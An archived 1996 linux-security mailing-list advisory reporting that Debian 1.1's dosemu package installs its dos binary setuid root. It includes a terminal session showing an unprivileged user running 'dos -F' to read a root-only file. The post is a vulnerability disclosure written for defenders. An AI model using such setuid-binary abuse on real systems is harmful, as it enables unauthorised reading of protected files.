[1293] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

[linux-security] Security hole in Debian 1.1 dosemu package

daemon@ATHENA.MIT.EDU (Daniel Quinlan)
Thu Nov 14 17:32:33 1996

Old-X-Envelope-From: quinlan@pathname.com  Thu Nov 14 03:15:23 1996
Date: Thu, 14 Nov 96 00:14 PST
From: Daniel Quinlan <quinlan@proton.pathname.com>
To: linux-security@tarsier.cv.nrao.edu
Reply-To: quinlan@pathname.com
Resent-From: linux-security@redhat.com

In Debian 1.1, the optional DOSEMU package installs /usr/sbin/dos
setuid root.  This is a serious security hole which can be exploited
to gain access to any file on the system.

Package: dosemu
Version: 0.64.0.2-9

------- start of cut text --------------
$ cat /etc/debian_version 
1.1
$ id
uid=xxxx(quinlan) gid=xxxx(quinlan) groups=xxxx(quinlan),20(dialout),24(cdrom)
[quinlan:~]$ ls -al /usr/bin/dos
-rwsr-xr-x   1 root     root       569576 Oct 24 00:05 /usr/bin/dos
$ ls -al /root/foo
-rw-------   1 root     root         1117 Nov 13 23:10 /root/foo
$ dos -F /root/foo
[ Prints /root/foo, which is not readable by user `quinlan'. ]
------- end ----------------------------

I expect there may be other holes in dosemu other than this one that
can be exploited if it is installed setuid root.  It took about 60
seconds to find this hole once I realized /usr/bin/dos was setuid
root.

Dan


home help back first fref pref prev next nref lref last post